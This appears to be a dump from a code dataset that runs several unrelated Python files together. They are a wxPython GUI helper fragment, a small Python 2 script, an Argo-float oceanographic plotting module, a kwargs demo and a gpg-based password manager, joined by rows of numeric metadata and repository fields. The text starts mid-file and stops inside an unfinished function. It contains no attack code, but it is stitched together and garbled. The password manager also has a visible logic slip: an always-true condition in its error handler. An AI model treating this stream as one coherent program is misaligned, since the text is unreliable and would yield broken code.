menu.AddItem(_("Select All"), callback = lambda: txt.SetSelection(0 , txt.GetLastPosition()), id=wx.ID_SELECTALL)
IMAGE_WILDCARD = ('Image files (*.gif;*.jpeg;*.jpg;*.png)|*.gif;*.jpeg;*.jpg;*.png|'
'All files (*.*)|*.*')
def pick_image_file(parent):
diag = wx.FileDialog(parent, _('Select an image file'),
wildcard = IMAGE_WILDCARD)
filename = None
try:
status = diag.ShowModal()
if status == wx.ID_OK:
filename = diag.Path
finally:
diag.Destroy()
return filename
def paint_outline(dc, control, color=None, border=1):
if color is None:
color = wx.Color(213, 213, 213)
dc.Brush = wx.TRANSPARENT_BRUSH
dc.Pen = wx.Pen(color)
r = control.Rect
r.Inflate(border, border)
dc.DrawRectangleRect(r)
def maybe_callable(val):
return val if not callable(val) else val()
def insert_text(textctrl, text):
ip = textctrl.InsertionPoint
if ip != 0 and textctrl.Value[ip-1] and textctrl.Value[ip-1] != ' ':
textctrl.WriteText(' ')
textctrl.WriteText(text + ' ')
def insert_shortened_url(textctrl, url, ondone=None, timeoutms=5000):
import util.net
textctrl.Freeze()
textctrl.Enable(False)
class C(object): pass
c = C()
c._finished = False
def finish(shorturl=None):
if c._finished: return
c._finished = True
insert_text(textctrl, shorturl or url)
textctrl.Thaw()
textctrl.Enable()
textctrl.SetFocus()
if ondone is not None:
ondone(shorturl)
def get():
short_url = None
with util.traceguard:
short_url = util.net.get_short_url(url)
if short_url is not None and len(short_url) >= len(url):
short_url = url
wx.CallAfter(lambda: finish(short_url))
util.threaded(get)()
if timeoutms is not None:
wx.CallLater(timeoutms, finish)
def cancel(): finish(None)
return cancel
def bind_special_paste(textctrl, shorten_urls=True, onbitmap=None, onfilename=None,
onshorten=None, onshorten_done=None):
import gui.clipboard as clipboard
def on_text_paste(e):
if e.EventObject is not textctrl: return e.Skip()
if onfilename is not None:
files = clipboard.get_files() or []
for file in files:
if file.isfile():
if onfilename(file) is False:
e.Skip()
return
if maybe_callable(shorten_urls):
text = clipboard.get_text()
if text is not None:
import util.net
if util.isurl(text) and not util.net.is_short_url(text):
cancellable = insert_shortened_url(textctrl, text, ondone=onshorten_done)
if onshorten is not None:
onshorten(cancellable)
else:
e.Skip()
return
if onbitmap is not None:
bitmap = clipboard.get_bitmap()
if bitmap is not None:
import stdpaths, time
filename = stdpaths.temp / 'digsby.clipboard.%s.png' % time.time()
bitmap.SaveFile(filename, wx.BITMAP_TYPE_PNG)
if onbitmap(filename, bitmap) is False:
e.Skip()
return
e.Skip()
textctrl.Bind(wx.EVT_TEXT_PASTE, on_text_paste)
def HelpLink(parent, url):
sz = wx.BoxSizer(wx.HORIZONTAL)
txt_left = wx.StaticText(parent, label = u' [')
link = wx.HyperlinkCtrl(parent, -1, label = u' ? ', url = url)
txt_right = wx.StaticText(parent, label = u']')
sz.Add(txt_left, flag = wx.ALIGN_CENTER_VERTICAL)
sz.Add(link, flag = wx.ALIGN_CENTER_VERTICAL)
sz.Add(txt_right, flag = wx.ALIGN_CENTER_VERTICAL)
return sz
def update_tooltip(ctrl, tip):
'''only updates a control's tooltip if it's different.'''
if tip is None:
if ctrl.ToolTip is not None:
ctrl.SetToolTip(None)
else:
if ctrl.ToolTip is None:
ctrl.SetToolTipString(tip)
elif ctrl.ToolTip.Tip != tip:
ctrl.ToolTip.SetTip(tip)
class tempdc(object):
def __init__(self, width, height, transparent=True):
self.width = width
self.height = height
self.transparent = transparent
def __enter__(self):
self.bitmap = wx.TransparentBitmap(self.width, self.height)
self.dc = wx.MemoryDC(self.bitmap)
return self.dc, self.bitmap
def __exit__(self, exc, val, tb):
self.dc.SelectObject(wx.NullBitmap)
| 30.549129 | 142 | 0.612422 | 6,164 | 49,123 | 4.78196 | 0.16499 | 0.005089 | 0.007939 | 0.002205 | 0.154295 | 0.118605 | 0.091871 | 0.078369 | 0.065138 | 0.063781 | 0 | 0.00812 | 0.278016 | 49,123 | 1,607 | 143 | 30.568139 | 0.822985 | 0.055392 | 0 | 0.17444 | 0 | 0 | 0.043026 | 0.003294 | 0 | 0 | 0.00042 | 0.002489 | 0.001866 | 0 | null | null | 0.010261 | 0.054104 | null | null | 0.017724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44ae9abc4a9a98e70e5eb2741c8483abff0fde6f | 234 | py | Python | print1.py | shubhamm033/googlepython | 03da9f056a795455ae30774a12d31d2f8b3ec299 | [
"Apache-2.0"
] | null | null | null | print1.py | shubhamm033/googlepython | 03da9f056a795455ae30774a12d31d2f8b3ec299 | [
"Apache-2.0"
] | 6 | 2020-03-24T15:37:56.000Z | 2021-04-30T20:33:32.000Z | print1.py | shubhamm033/googlepython | 03da9f056a795455ae30774a12d31d2f8b3ec299 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python -tt
import sys
def repeat(name,age):
if name == 'Guido' or age ==2:
print 10
else:
print 101
def main():
repeat(sys.argv[1],sys.argv[2])
if __name__ == '__main__':
main() | 6.882353 | 32 | 0.538462 | 34 | 234 | 3.470588 | 0.617647 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04908 | 0.303419 | 234 | 34 | 33 | 6.882353 | 0.674847 | 0.08547 | 0 | 0 | 0 | 0 | 0.060748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44b3434f83833b5a418dc8a7e1ea5e2d80329437 | 11,843 | py | Python | bgcArgoDMQC/fplt.py | ArgoCanada/bgcArgoDMQC | 513b05729e605eed2cd9dafe9aef6260f577a0b5 | [
"MIT"
] | 3 | 2020-11-30T14:49:43.000Z | 2022-02-08T17:23:36.000Z | bgcArgoDMQC/fplt.py | ArgoCanada/bgcArgoDMQC | 513b05729e605eed2cd9dafe9aef6260f577a0b5 | [
"MIT"
] | 32 | 2020-11-11T16:00:04.000Z | 2022-02-23T18:59:48.000Z | bgcArgoDMQC/fplt.py | ArgoCanada/bgcArgoDMQC | 513b05729e605eed2cd9dafe9aef6260f577a0b5 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import seaborn as sns
sns.set(style='ticks', context='paper', palette='colorblind')
try:
import cmocean.cm as cmo
cmocean_flag = True
except:
cmocean_flag = False
class pltClass:
def __init__(self):
self.__info__ = 'Python qc package plt class'
def float_ncep_inair(sdn, flt, ncep, ax=None, legend=True):
if ax is None:
fig, ax = plt.subplots()
else:
fig = ax.get_figure()
ax.plot(sdn, flt, linewidth=2, label='Float')
ax.plot(sdn, ncep, linewidth=2, label='NCEP')
if legend:
ax.legend(loc=3)
mhr = mdates.MonthLocator(interval=4)
mihr = mdates.MonthLocator()
fmt = mdates.DateFormatter('%b %Y')
ax.xaxis.set_major_locator(mhr)
ax.xaxis.set_major_formatter(fmt)
ax.xaxis.set_minor_locator(mihr)
ax.set_ylabel('pO$_2$ (mbar)')
for tick in ax.get_xticklabels():
tick.set_rotation(45)
g = pltClass()
g.fig = fig
g.axes = [ax]
return g
def float_woa_surface(sdn, flt, woa, ax=None, legend=True):
if ax is None:
fig, ax = plt.subplots()
else:
fig = ax.get_figure()
ax.plot(sdn, flt, linewidth=2, label='Float')
ax.plot(sdn, woa, linewidth=2, label='WOA18')
if legend:
ax.legend(loc=3)
mhr = mdates.MonthLocator(interval=4)
mihr = mdates.MonthLocator()
fmt = mdates.DateFormatter('%b %Y')
ax.xaxis.set_major_locator(mhr)
ax.xaxis.set_major_formatter(fmt)
ax.xaxis.set_minor_locator(mihr)
ax.set_ylabel('O$_2$ Saturation %')
for tick in ax.get_xticklabels():
tick.set_rotation(45)
g = pltClass()
g.fig = fig
g.axes = [ax]
return g
def gains(sdn, gains, inair=True, ax=None, legend=True):
if ax is None:
fig, ax = plt.subplots()
else:
fig = ax.get_figure()
ax.plot(sdn, gains, 'o', markeredgewidth=0.5, markersize=5, markeredgecolor='grey', zorder=3, label='Gains')
ax.axhline(np.nanmean(gains), color='k', linestyle='--', label='Mean = {:.2f}'.format(np.nanmean(gains)), zorder=2)
ax.axhline(1.0, color='k', linestyle='-', linewidth=0.5, label=None,zorder=1)
if legend:
ax.legend(loc=3)
mhr = mdates.MonthLocator(interval=4)
mihr = mdates.MonthLocator()
fmt = mdates.DateFormatter('%b %Y')
ax.xaxis.set_major_locator(mhr)
ax.xaxis.set_major_formatter(fmt)
ax.xaxis.set_minor_locator(mihr)
ax.set_ylabel('O$_2$ Gain (unitless)')
for tick in ax.get_xticklabels():
tick.set_rotation(45)
g = pltClass()
g.fig = fig
g.axes = [ax]
return g
def gainplot(sdn, float_data, ref_data, gainvals, ref):
fig, axes = plt.subplots(2,1,sharex=True)
if ref == 'NCEP':
g1 = float_ncep_inair(sdn, float_data, ref_data, ax=axes[0])
g2 = gains(sdn, gainvals, inair=False, ax=axes[1])
elif ref == 'WOA':
g1 = float_woa_surface(sdn, float_data, ref_data, ax=axes[0])
g2 = gains(sdn, gainvals, inair=False, ax=axes[1])
g = pltClass()
g.fig = fig
g.axes = axes
return g
def var_cscatter(df, varname='DOXY', cmap=None, ax=None, ylim=(0,2000), clabel=None, vmin=None, vmax=None, **kwargs):
# define colormaps
if cmocean_flag:
color_maps = dict(
TEMP=cmo.thermal,
TEMP_ADJUSTED=cmo.thermal,
PSAL=cmo.haline,
PSAL_ADJUSTED=cmo.haline,
PDEN=cmo.dense,
CHLA=cmo.algae,
CHLA_ADJUSTED=cmo.algae,
BBP700=cmo.matter,
BBP700_ADJUSTED=cmo.matter,
DOXY=cmo.ice,
DOXY_ADJUSTED=cmo.ice,
DOWNWELLING_IRRADIANCE=cmo.solar,
)
else:
color_maps = dict(
TEMP=plt.cm.inferno,
TEMP_ADJUSTED=plt.cm.inferno,
PSAL=plt.cm.viridis,
PSAL_ADJUSTED=plt.cm.viridis,
PDEN=plt.cm.cividis,
CHLA=plt.cm.YlGn,
CHLA_ADJUSTED=plt.cm.YlGn,
BBP700=plt.cm.pink_r,
BBP700_ADJUSTED=plt.cm.pink_r,
DOXY=plt.cm.YlGnBu_r,
DOXY_ADJUSTED=plt.cm.YlGnBu_r,
DOWNWELLING_IRRADIANCE=plt.cm.magma,
)
if clabel is None:
var_units = dict(
TEMP='Temperature ({}C)'.format(chr(176)),
TEMP_ADJUSTED='Temperature ({}C)'.format(chr(176)),
PSAL='Practical Salinity',
PSAL_ADJUSTED='Practical Salinity',
PDEN='Potential Density (kg m${-3}$)',
CHLA='Chlorophyll (mg m$^{-3}$',
CHLA_ADJUSTED='Chlorophyll (mg m$^{-3}$',
BBP700='$\mathsf{b_{bp}}$ (m$^{-1}$)',
BBP700_ADJUSTED='$\mathsf{b_{bp}}$ (m$^{-1}$)',
DOXY='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
DOXY_ADJUSTED='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
DOWNWELLING_IRRADIANCE='Downwelling Irradiance (W m$^{-2}$)',
)
clabel = var_units[varname]
if cmap is None:
cmap = color_maps[varname]
if ax is None:
fig, ax = plt.subplots()
else:
fig = ax.get_figure()
df = df.loc[df.PRES < ylim[1]+50]
if vmin is None:
vmin = 1.05*df[varname].min()
if vmax is None:
vmax = 0.95*df[varname].max()
im = ax.scatter(df.SDN, df.PRES, c=df[varname], s=50, cmap=cmap, vmin=vmin, vmax=vmax, **kwargs)
cb = plt.colorbar(im, ax=ax)
cb.set_label(clabel)
ax.set_ylim(ylim)
ax.invert_yaxis()
ax.set_ylabel('Depth (dbar)')
w, h = fig.get_figwidth(), fig.get_figheight()
fig.set_size_inches(w*2, h)
mhr = mdates.MonthLocator(interval=4)
mihr = mdates.MonthLocator()
fmt = mdates.DateFormatter('%b %Y')
ax.xaxis.set_major_locator(mhr)
ax.xaxis.set_major_formatter(fmt)
ax.xaxis.set_minor_locator(mihr)
g = pltClass()
g.fig = fig
g.axes = [ax]
g.cb = cb
return g
def profiles(df, varlist=['DOXY'], Ncycle=1, Nprof=np.inf, zvar='PRES', xlabels=None, ylabel=None, axes=None, ylim=None, **kwargs):
if xlabels is None:
var_units = dict(
TEMP='Temperature ({}C)'.format(chr(176)),
TEMP_ADJUSTED='Temperature ({}C)'.format(chr(176)),
PSAL='Practical Salinity',
PSAL_ADJUSTED='Practical Salinity',
PDEN='Potential Density (kg m$^{-3}$)',
CHLA='Chlorophyll (mg m$^{-3}$',
CHLA_ADJUSTED='Chlorophyll (mg m$^{-3}$',
BBP700='$\mathsf{b_{bp}}$ (m$^{-1}$)',
BBP700_ADJUSTED='$\mathsf{b_{bp}}$ (m$^{-1}$)',
CDOM='CDOM (mg m$^{-3}$)',
CDOM_ADJUSTED='CDOM (mg m$^{-3}$)',
DOXY='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
DOXY_ADJUSTED='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
DOWNWELLING_IRRADIANCE='Downwelling Irradiance (W m$^{-2}$)',
)
xlabels = [var_units[v] if v in var_units.keys() else '' for v in varlist]
cm = plt.cm.gray_r
if axes is None:
fig, axes = plt.subplots(1, len(varlist), sharey=True)
if len(varlist) == 1:
axes = [axes]
elif len(varlist) > 1:
fig = axes[0].get_figure()
else:
fig = axes.get_figure()
axes = [axes]
if ylim is None:
if zvar == 'PRES':
ylim=(0,2000)
if ylabel is None:
ylabel = 'Pressure (dbar)'
elif zvar == 'PDEN':
ylim = (df.PDEN.min(), df.PDEN.max())
if ylabel is None:
ylabel = 'Density (kg m$^{-3}$)'
df.loc[df[zvar] > ylim[1]*1.1] = np.nan
CYCNUM = df.CYCLE.unique()
greyflag = False
if not 'color' in kwargs.keys():
greyflag = True
else:
c = kwargs.pop('color')
if Nprof > CYCNUM.shape[0]:
Nprof = CYCNUM.shape[0]
for i,v in enumerate(varlist):
for n in range(Nprof):
subset_df = df.loc[df.CYCLE == CYCNUM[Ncycle-1 + n-1]]
if greyflag:
c = cm(0.75*(CYCNUM[Ncycle-1 + n-1]/CYCNUM[-1])+0.25)
axes[i].plot(subset_df[v], subset_df[zvar], color=c, **kwargs)
axes[i].set_ylim(ylim[::-1])
axes[i].set_xlabel(xlabels[i])
subset_df = df.loc[df.CYCLE == CYCNUM[Ncycle-1]]
date = mdates.num2date(subset_df.SDN.iloc[0]).strftime('%d %b, %Y')
axes[0].set_ylabel(ylabel)
if Nprof != 1:
axes[0].set_title('Cyc. {:d}-{:d}, {}'.format(int(CYCNUM[Ncycle-1]), int(CYCNUM[Ncycle-1+Nprof-1]), date))
else:
axes[0].set_title('Cyc. {:d}, {}'.format(int(CYCNUM[Ncycle-1]), date))
w, h = fig.get_figwidth(), fig.get_figheight()
fig.set_size_inches(w*len(varlist)/3, h)
g = pltClass()
g.fig = fig
g.axes = axes
return g
def qc_profiles(df, varlist=['DOXY'], Ncycle=1, Nprof=np.inf, zvar='PRES', xlabels=None, ylabel=None, axes=None, ylim=None, **kwargs):
if xlabels is None:
var_units = dict(
TEMP='Temperature ({}C)'.format(chr(176)),
TEMP_ADJUSTED='Temperature ({}C)'.format(chr(176)),
PSAL='Practical Salinity',
PSAL_ADJUSTED='Practical Salinity',
PDEN='Potential Density (kg m$^{-3}$)',
CHLA='Chlorophyll (mg m$^{-3}$',
CHLA_ADJUSTED='Chlorophyll (mg m$^{-3}$',
BBP700='$\mathsf{b_{bp}}$ (m$^{-1}$)',
BBP700_ADJUSTED='$\mathsf{b_{bp}}$ (m$^{-1}$)',
CDOM='CDOM (mg m$^{-3}$)',
CDOM_ADJUSTED='CDOM (mg m$^{-3}$)',
DOXY='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
DOXY_ADJUSTED='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
DOWNWELLING_IRRADIANCE='Downwelling Irradiance (W m$^{-2}$)',
)
xlabels = [var_units[v] for v in varlist]
if axes is None:
fig, axes = plt.subplots(1, len(varlist), sharey=True)
if len(varlist) == 1:
axes = [axes]
elif len(varlist) > 1:
fig = axes[0].get_figure()
else:
fig = axes.get_figure()
axes = [axes]
if ylim is None:
if zvar == 'PRES':
ylim=(0,2000)
if ylabel is None:
ylabel = 'Pressure (dbar)'
elif zvar == 'PDEN':
ylim = (df.PDEN.min(), df.PDEN.max())
if ylabel is None:
ylabel = 'Density (kg m$^{-3}$)'
df.loc[df[zvar] > ylim[1]*1.1] = np.nan
CYCNUM = df.CYCLE.unique()
if Nprof > CYCNUM.shape[0]:
Nprof = CYCNUM.shape[0]
groups = {'Good':[1,2,5], 'Probably Bad':[3], 'Bad':[4], 'Interpolated':[8]}
colors = {'Good':'green', 'Probably Bad':'yellow', 'Bad':'red', 'Interpolated':'blue'}
for i,v in enumerate(varlist):
vqc = v + '_QC'
for n in range(Nprof):
subset_df = df.loc[df.CYCLE == CYCNUM[Ncycle-1 + n-1]]
for k,f in groups.items():
flag_subset_df = subset_df[subset_df[vqc].isin(f)]
axes[i].plot(flag_subset_df[v], flag_subset_df[zvar], 'o', markeredgewidth=0.1, markeredgecolor='k', markerfacecolor=colors[k], **kwargs)
axes[i].set_ylim(ylim[::-1])
axes[i].set_xlabel(xlabels[i])
subset_df = df.loc[df.CYCLE == CYCNUM[Ncycle-1]]
date = mdates.num2date(subset_df.SDN.iloc[0]).strftime('%d %b, %Y')
axes[0].set_ylabel(ylabel)
if Nprof != 1:
axes[0].set_title('Cyc. {:d}-{:d}, {}'.format(int(CYCNUM[Ncycle-1]), int(CYCNUM[Ncycle-1+Nprof-1]), date))
else:
axes[0].set_title('Cyc. {:d}, {}'.format(int(CYCNUM[Ncycle-1]), date))
w, h = fig.get_figwidth(), fig.get_figheight()
fig.set_size_inches(w*len(varlist)/3, h)
g = pltClass()
g.fig = fig
g.axes = axes
return g
| 30.211735 | 153 | 0.559909 | 1,623 | 11,843 | 3.982748 | 0.152803 | 0.016708 | 0.018564 | 0.018564 | 0.686108 | 0.680848 | 0.673731 | 0.673731 | 0.670173 | 0.659035 | 0 | 0.024951 | 0.272397 | 11,843 | 391 | 154 | 30.289003 | 0.725194 | 0.001351 | 0 | 0.678808 | 0 | 0 | 0.130317 | 0.01167 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02649 | false | 0 | 0.016556 | 0 | 0.069536 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44c6e896f823576d5d53f2d5f0e88e2fd6fdc726 | 392 | py | Python | section4: methods and functions/2-arguments.py | rpotter12/learning-python | 57200fe296e0d297b96a785e7e27ee3a44694eaf | [
"MIT"
] | 2 | 2018-12-05T05:04:59.000Z | 2020-01-29T02:42:40.000Z | section4: methods and functions/2-arguments.py | rpotter12/learning-python | 57200fe296e0d297b96a785e7e27ee3a44694eaf | [
"MIT"
] | null | null | null | section4: methods and functions/2-arguments.py | rpotter12/learning-python | 57200fe296e0d297b96a785e7e27ee3a44694eaf | [
"MIT"
] | null | null | null | # *args - arguments - it returns tuple
# **kwargs - keyword arguments - it returns dictionary
def myfunc(*args):
print(args)
myfunc(1,2,3,4,5,6,7,8,9,0)
def myfunc1(**kwargs):
print(kwargs)
if 'fruit' in kwargs:
print('my fruit of choice is {}'.format(kwargs['fruit']))
else:
print('I did not find any fruit here')
myfunc1(fruit='apple',veggie='lettuce')
| 23.058824 | 65 | 0.635204 | 59 | 392 | 4.220339 | 0.677966 | 0.088353 | 0.144578 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.204082 | 392 | 16 | 66 | 24.5 | 0.759615 | 0.229592 | 0 | 0 | 0 | 0 | 0.250836 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0 | 0 | 0.2 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44c89577e517f8807975d3af226cfb6c8918ae4e | 13,776 | py | Python | sdb/passwords.py | gavinwahl/sdb | 27abec1f9001d541124ea57c258ca48f930d6d88 | [
"BSD-2-Clause"
] | 1 | 2015-12-28T07:02:10.000Z | 2015-12-28T07:02:10.000Z | sdb/passwords.py | gavinwahl/sdb | 27abec1f9001d541124ea57c258ca48f930d6d88 | [
"BSD-2-Clause"
] | null | null | null | sdb/passwords.py | gavinwahl/sdb | 27abec1f9001d541124ea57c258ca48f930d6d88 | [
"BSD-2-Clause"
] | null | null | null | import os
import ast
import sys
import math
import time
import string
import hashlib
import tempfile
import subprocess
from operator import itemgetter
from contextlib import contextmanager
from getpass import getpass
import random; random = random.SystemRandom()
import sdb.subprocess_compat as subprocess
from sdb.util import force_bytes
from sdb.clipboard import set_clipboard_once, ClipboardException
from sdb.diceware import WORDS
from sdb import gpg_agent
def encode(records):
res = []
for record in records:
res.append(repr(record))
return ('\n'.join(res) + '\n').encode('utf-8')
def decode(str):
records = []
for line in str.decode('utf-8').split('\n'):
if line:
records.append(ast.literal_eval(line))
return records
CASE_ALPHABET = string.ascii_letters
ALPHANUMERIC = CASE_ALPHABET + string.digits
EVERYTHING = ALPHANUMERIC + string.punctuation
def gen_password(choices=ALPHANUMERIC, length=10):
return ''.join(random.choice(choices) for i in range(length))
def requirements_satisfied(requirements, str):
return all([i in str for i in requirements])
def gen_password_require(requirements, choices=ALPHANUMERIC, length=10):
"""
Generate a password containing all the characters in requirements
"""
if len(requirements) > length or not requirements_satisfied(requirements, choices):
raise Exception(
"That's impossible, you can't make a password containing %r with only %r!" % (
requirements, choices))
while True:
pw = gen_password(choices, length)
if requirements_satisfied(requirements, pw):
return pw
def gen_password_entropy(entropy, choices=ALPHANUMERIC):
"""
Generates a password of the desired entropy, calculating the length as
required.
"""
required_length = int(math.ceil(entropy / math.log(len(choices), 2)))
return gen_password(choices=choices, length=required_length)
def match(needle, haystack):
score = 1
j = 0
last_match = 0
for c in needle:
while j < len(haystack) and haystack[j] != c:
j += 1
if j >= len(haystack):
return 0
score += 1 / (last_match + 1.)
last_match = j
j += 1
return score
def record_score(term, records):
return match(term, records[0] + records[1] + records[3])
def search(term, records):
records = [(record_score(term, i), i) for i in records]
records = list(filter(itemgetter(0), records))
records.sort(key=itemgetter(0), reverse=True)
return [i[1] for i in records]
def is_unique_list(lst):
return len(lst) == len(set(lst))
def disambiguate(records):
choices = [itemgetter(0),
itemgetter(0, 1),
itemgetter(0, 1, 3)]
for choice in choices:
result = list(map(choice, records))
if is_unique_list(result):
return result
# just in case none were unique
return records
class GPGException(Exception):
pass
class IncorrectPasswordException(GPGException):
pass
class InvalidEncryptedFileException(GPGException):
pass
class FileCorruptionException(GPGException):
pass
def gpg_exception_factory(returncode, message):
if returncode == 2:
if b'decryption failed: bad key' in message:
return IncorrectPasswordException(message)
if b'CRC error;' in message:
return FileCorruptionException(message)
if b'fatal: zlib inflate problem: invalid distance' in message:
return FileCorruptionException(message)
if b'decryption failed: invalid packet' in message:
return FileCorruptionException(message)
if b'no valid OpenPGP data found':
return InvalidEncryptedFileException(message)
return Exception("unkown error", returncode, message)
def dencrypt(command, pw, data):
"""
Encrypts or decrypts, by running command
"""
if '\n' in pw:
raise Exception('Newlines not allowed in passwords')
proc = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
proc.stdin.write(force_bytes(pw))
proc.stdin.write(b'\n')
proc.stdin.write(data)
output, erroroutput = proc.communicate()
if proc.returncode != 0:
raise gpg_exception_factory(proc.returncode, erroroutput)
return output
def encrypt(pw, data):
return dencrypt(
['gpg', '-c',
'--passphrase-fd', '0',
'--batch',
'--armor',
'--cipher-algo', 'AES',
'--digest-algo', 'SHA256'],
pw,
data,
)
def decrypt(pw, data):
return dencrypt(
['gpg', '-d', '--passphrase-fd', '0', '--batch'],
pw,
data
)
def get_tmp_file(filename):
file_parts = os.path.split(filename)
return os.path.join(*file_parts[:-1] + ('.' + file_parts[-1].lstrip('.') + '.tmp',))
def get_backup_file(filename):
file_parts = os.path.split(filename)
return os.path.join(*file_parts[:-1] + ('.' + file_parts[-1].lstrip('.') + '.bak',))
@contextmanager
def atomic_replace(filename):
"""
::
with atomic_replace(filename) as f:
f.write('asdf')
with atomic_replace(filename) as f:
f.write('asdf')
raise Exception
# nothing happens to the file
"""
tmpfile_name = get_tmp_file(filename)
fd = os.open(tmpfile_name, os.O_CREAT | os.O_EXCL | os.O_RDWR, 0o600)
try:
f = os.fdopen(fd, "w+b")
yield f
f.flush()
os.fsync(fd) # fdatasync? I don't know
f.seek(0)
new_content = f.read()
if not new_content:
raise Exception("I don't think you want to blank this file...")
try:
with open(filename, 'rb') as current_f:
current_content = current_f.read()
except IOError:
current_content = b''
if current_content != new_content:
with open(get_backup_file(filename), 'w+b') as backup_file:
backup_file.write(current_content)
except:
# If there was an exception, remove the temporary file and reraise
os.unlink(tmpfile_name)
raise
else:
# No exception, rename the temp file over the original
os.rename(tmpfile_name, filename)
finally:
f.close()
def edit_in_editor(current):
EDITOR = os.environ.get('EDITOR', 'vim')
with tempfile.NamedTemporaryFile(mode='w+') as f:
try:
f.write(current)
f.flush()
subprocess.call([EDITOR, f.name])
f.seek(0)
return f.read()
finally:
# don't leave potentially private data lying around
f.write('0' * os.path.getsize(f.name))
f.flush()
def pretty_record(record):
s = '%s@%s' % (record[1], record[0])
if record[3]:
s += ': ' + record[3]
return s
class InteractiveSession(object):
def __init__(self, args, output=sys.stdout, input=sys.stdin, password=None):
self.args = args
self.file = args.file
self.output = output
self.input = input
try:
self.gpg_agent = gpg_agent.GpgAgent()
except KeyError:
self.gpg_agent = None
self.gpg_agent_password_id = 'sdb_m:{file_fingerprint}'.format(
file_fingerprint=hashlib.md5(force_bytes(self.file)).hexdigest()
)
self.password = password
if not self.password:
self.password = self.get_master_password()
def get_master_password(self, error=None):
if self.password:
return self.password
if self.input == sys.stdin:
if self.gpg_agent:
error = error or 'X'
self.password = self.gpg_agent.get_passphrase(
self.gpg_agent_password_id,
prompt='Master password',
error=error
)
else:
if error:
self.output.write('Error: {error}, try again: '.format(error=error))
self.password = getpass()
else:
self.output.write('Password: ')
self.output.flush()
self.password = self.input.readline().rstrip('\n')
return self.password
def clear_master_password(self):
self.password = None
if self.gpg_agent:
self.gpg_agent.clear_passphrase(self.gpg_agent_password_id)
def prompt(self, prompt='', required=True, password=False):
while True:
if password and self.input == sys.stdin:
line = getpass(prompt)
else:
self.output.write(prompt)
self.output.flush()
line = self.input.readline().rstrip('\n')
if not required or line:
return line
def get_record(self, domain=None):
domain = domain or self.prompt('Domain: ')
username = self.prompt('Username: ')
password = self.prompt(
'Password [blank to generate]: ',
required=False,
password=True
) or gen_password_entropy(128)
notes = self.prompt('Notes: ', required=False)
return (domain, username, password, notes)
def edit_record(self, record):
new_record = list(record)
new_record[0] = self.prompt('Name [%s]: ' % record[0], required=False) or record[0]
new_record[1] = self.prompt('Username [%s]: ' % record[1], required=False) or record[1]
pw = self.prompt('Password []/g: ', required=False, password=True) or record[2]
if pw == 'g':
new_record[2] = gen_password_entropy(128)
elif pw:
new_record[2] = pw
self.output.write("Notes: %s\n" % record[3])
edit = self.prompt('Edit? [n]: ', required=False) or 'n'
if edit[0] == 'y':
new_record[3] = edit_in_editor(record[3])
return tuple(new_record)
def find_record(self, query, records):
possibilities = search(query, records)
if len(possibilities) > 1:
choices = disambiguate(possibilities)
for i, choice in enumerate(choices):
self.output.write('%s) %s\n' % (i, choice))
choice = self.prompt('Which did you mean? [0]: ', required=False) or 0
return possibilities[int(choice)]
else:
return possibilities[0]
def read_records(self, error=None):
try:
with open(self.file, 'rb') as f:
password = self.get_master_password(error)
try:
return decode(decrypt(password, f.read()))
except IncorrectPasswordException:
self.clear_master_password()
return self.read_records(error='Incorrect password')
except:
self.clear_master_password()
raise
except IOError:
return []
def add_action(self):
record = self.get_record(self.args.domain or self.prompt('Domain: '))
def add(records):
return records + [record]
self.edit_transaction(add)
def show_action(self, clipboard=10):
record = self.find_record(self.args.domain or self.prompt("Domain: "), self.read_records())
self.output.write(pretty_record(record))
self.output.write("\n")
if clipboard:
try:
self.output.write("username in clipboard\n")
set_clipboard_once(record[1])
self.output.write("password in clipboard\n")
set_clipboard_once(record[2])
except ClipboardException as e:
self.output.write("couldn't set clipboard: %s\n" % e.output.split('\n')[0])
self.output.write(record[2])
self.output.write("\n")
else:
return record[2]
def edit_transaction(self, callback):
with atomic_replace(self.file) as out:
records = callback(self.read_records())
assert isinstance(records, list)
if not is_unique_list(records):
raise Exception("You have two identical records. I don't think you want this.")
out.write(encrypt(self.password, encode(records)))
out.seek(0)
assert records == decode(decrypt(self.password, out.read()))
def edit_action(self):
def edit(records):
